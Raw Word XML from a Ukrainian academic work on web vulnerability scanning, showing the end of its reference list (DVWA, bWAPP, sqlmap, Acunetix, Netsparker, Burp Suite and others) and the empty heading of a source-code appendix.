          <w:tab w:val="left" w:pos="1276"/>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Долгин А. А., Хорев П. Б., Разработка сканера уязвимостей компьютерных систем на основе защищенных версий ОС Windows, Труды международной научно-технической конференции «Информационные средства и технологии», том 2, М., 2005, 76-78 с</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7B433F" w14:textId="77777777" w:rsidR="00FB6169" w:rsidRPr="00FB6169" w:rsidRDefault="00FB6169" w:rsidP="00FB6169">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1276"/>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Damn Vulnerable Web Application (DVWA) [Електронний ресурс] режим доступу: https://kali.tools/?p=1820</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A07A4D" w14:textId="03F4706A" w:rsidR="00FB6169" w:rsidRDefault="00FB6169" w:rsidP="00FB6169">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1276"/>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">bWAPP [Електронний ресурс] режим доступу: </w:t>
      </w:r>
      <w:hyperlink r:id="rId43" w:history="1">
        <w:r w:rsidRPr="00FB6169">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:color w:val="auto"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>https://kali.tools/?p=2330</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3680B159" w14:textId="3DD1EFF7" w:rsidR="00FB6169" w:rsidRDefault="007679D8" w:rsidP="00FB6169">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1276"/>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Django</w:t>
      </w:r>
      <w:r w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[Електронний ресурс] режим доступу:</w:t>
      </w:r>
      <w:r w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId44" w:history="1">
        <w:r w:rsidRPr="007679D8">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:color w:val="auto"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>https://developer.mozilla.org/uk/docs/Learn/Server-side/Django</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1B64CB3E" w14:textId="41EF9F99" w:rsidR="007679D8" w:rsidRPr="007679D8" w:rsidRDefault="007679D8" w:rsidP="007679D8">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1276"/>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[Електронний ресурс] режим доступу: https://developer.mozilla.org/uk/docs/Learn/Getting_started_with_the_web/JavaScript_basics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B48C5DA" w14:textId="2BB411FE" w:rsidR="007679D8" w:rsidRPr="007679D8" w:rsidRDefault="007679D8" w:rsidP="007679D8">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1276"/>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[Електронний ресурс] режим доступу: https://developer.mozilla.org/uk/docs/Learn/Getting_started_with_the_web/HTML_basics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306B584E" w14:textId="7CEA378F" w:rsidR="007679D8" w:rsidRPr="007679D8" w:rsidRDefault="007679D8" w:rsidP="007679D8">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1276"/>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>VMWare</w:t>
      </w:r>
      <w:r w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[Електронний ресурс] режим доступу: https://itpro.ua/product/vmware-workstation-12-pro/?tab=description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABB5CCE" w14:textId="6328BF24" w:rsidR="007679D8" w:rsidRPr="007679D8" w:rsidRDefault="007679D8" w:rsidP="007679D8">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1276"/>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">[Електронний ресурс] режим доступу: </w:t>
      </w:r>
      <w:hyperlink r:id="rId45" w:history="1">
        <w:r w:rsidRPr="007679D8">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:color w:val="auto"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>https://ubuntu.ru/about</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F6C43BB" w14:textId="77A01140" w:rsidR="007679D8" w:rsidRPr="007679D8" w:rsidRDefault="007679D8" w:rsidP="007679D8">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1276"/>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Wamp</w:t>
      </w:r>
      <w:r w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[Електронний ресурс] режим доступу: http://www.wampserver.com/ru/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2CAEF9" w14:textId="30D8C828" w:rsidR="007679D8" w:rsidRDefault="007679D8" w:rsidP="007679D8">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1276"/>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Wamp</w:t>
      </w:r>
      <w:r w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[Електронний ресурс] режим доступу: http://www.dvwa.co.uk/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0052F78C" w14:textId="03AE6BAB" w:rsidR="00355D23" w:rsidRDefault="00355D23" w:rsidP="00355D23">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1276"/>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Сканери вразливостей</w:t>
      </w:r>
      <w:r w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">[Електронний ресурс] режим доступу: </w:t>
      </w:r>
      <w:r w:rsidRPr="00355D23">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>https://wiki.cuspu.edu.ua/index.php/%D0%A1%D0%BA%D0%B0%D0%BD%D0%B5%D1%80%D0%B8_%D0%B2%D1%80%D0%B0%D0%B7%D0%BB%D0%B8%D0%B2%D0%BE%D1%81%D1%82%D0%B5%D0%B9._%D0%A1%D0%9F%D0%9A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCE9E7E" w14:textId="5E88A5C5" w:rsidR="008F0C58" w:rsidRDefault="008F0C58" w:rsidP="008F0C58">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1276"/>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="008F0C58">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Електронний</w:t>
      </w:r>
      <w:r w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ресурс] режим доступу: </w:t>
      </w:r>
      <w:r w:rsidRPr="008F0C58">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>https://kali.tools/?p=816</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1044D5" w14:textId="3D44A944" w:rsidR="00772CE7" w:rsidRDefault="00772CE7" w:rsidP="00772CE7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1276"/>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Acunetix</w:t>
      </w:r>
      <w:r w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="008F0C58">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Електронний</w:t>
      </w:r>
      <w:r w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ресурс] режим доступу: </w:t>
      </w:r>
      <w:r w:rsidR="00405BD4" w:rsidRPr="00405BD4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http://bug.kpi.ua/web/index.php?r=site%2Farticle&amp;id=40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1E6B93" w14:textId="4B216160" w:rsidR="00877BAF" w:rsidRDefault="00877BAF" w:rsidP="00877BAF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1276"/>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Netsparker</w:t>
      </w:r>
      <w:r w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="008F0C58">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Електронний</w:t>
      </w:r>
      <w:r w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ресурс] режим доступу: </w:t>
      </w:r>
      <w:r w:rsidRPr="00877BAF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>https://www.anti-malware.ru/products/Netsparker-Enterprise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA17105" w14:textId="49356CF4" w:rsidR="004B547E" w:rsidRPr="004B547E" w:rsidRDefault="004B547E" w:rsidP="004B547E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1276"/>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Burp</w:t>
      </w:r>
      <w:r w:rsidRPr="004B547E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Suite</w:t>
      </w:r>
      <w:r w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="008F0C58">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Електронний</w:t>
      </w:r>
      <w:r w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ресурс] режим доступу: </w:t>
      </w:r>
      <w:r w:rsidRPr="004B547E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>https://habr.com/ru/post/328382/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55652D17" w14:textId="77777777" w:rsidR="008F0C58" w:rsidRPr="00772CE7" w:rsidRDefault="008F0C58" w:rsidP="008F0C58">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1276"/>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EAD173B" w14:textId="6CD25C9E" w:rsidR="004B547E" w:rsidRDefault="007679D8" w:rsidP="004B547E">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C1A52C" w14:textId="1160FD84" w:rsidR="007679D8" w:rsidRPr="004B547E" w:rsidRDefault="007679D8" w:rsidP="007679D8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="232C81B7" w14:textId="4AEF4F26" w:rsidR="00DE61AE" w:rsidRDefault="00DE61AE">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3013ED" w14:textId="77777777" w:rsidR="00A75083" w:rsidRDefault="00DE61AE" w:rsidP="00A75083">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="137" w:name="_Toc30433165"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Додаток А.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="137"/>
    </w:p>
    <w:p w14:paraId="11A8BF32" w14:textId="7A468382" w:rsidR="00A75083" w:rsidRDefault="00DE61AE" w:rsidP="00A75083">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="360"/>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6039B4FE" w14:textId="05F74609" w:rsidR="00DE61AE" w:rsidRPr="00A75083" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A75083">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Фрагмент вихідного коду програмного засобу</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361680A2" w14:textId="185187E4" w:rsidR="00DE61AE" w:rsidRDefault="00DE61AE" w:rsidP="00DE61AE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AD702C8" w14:textId="75927B09" w:rsidR="00DE61AE" w:rsidRPr="00A75083" w:rsidRDefault="00DE61AE" w:rsidP="00A75083">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
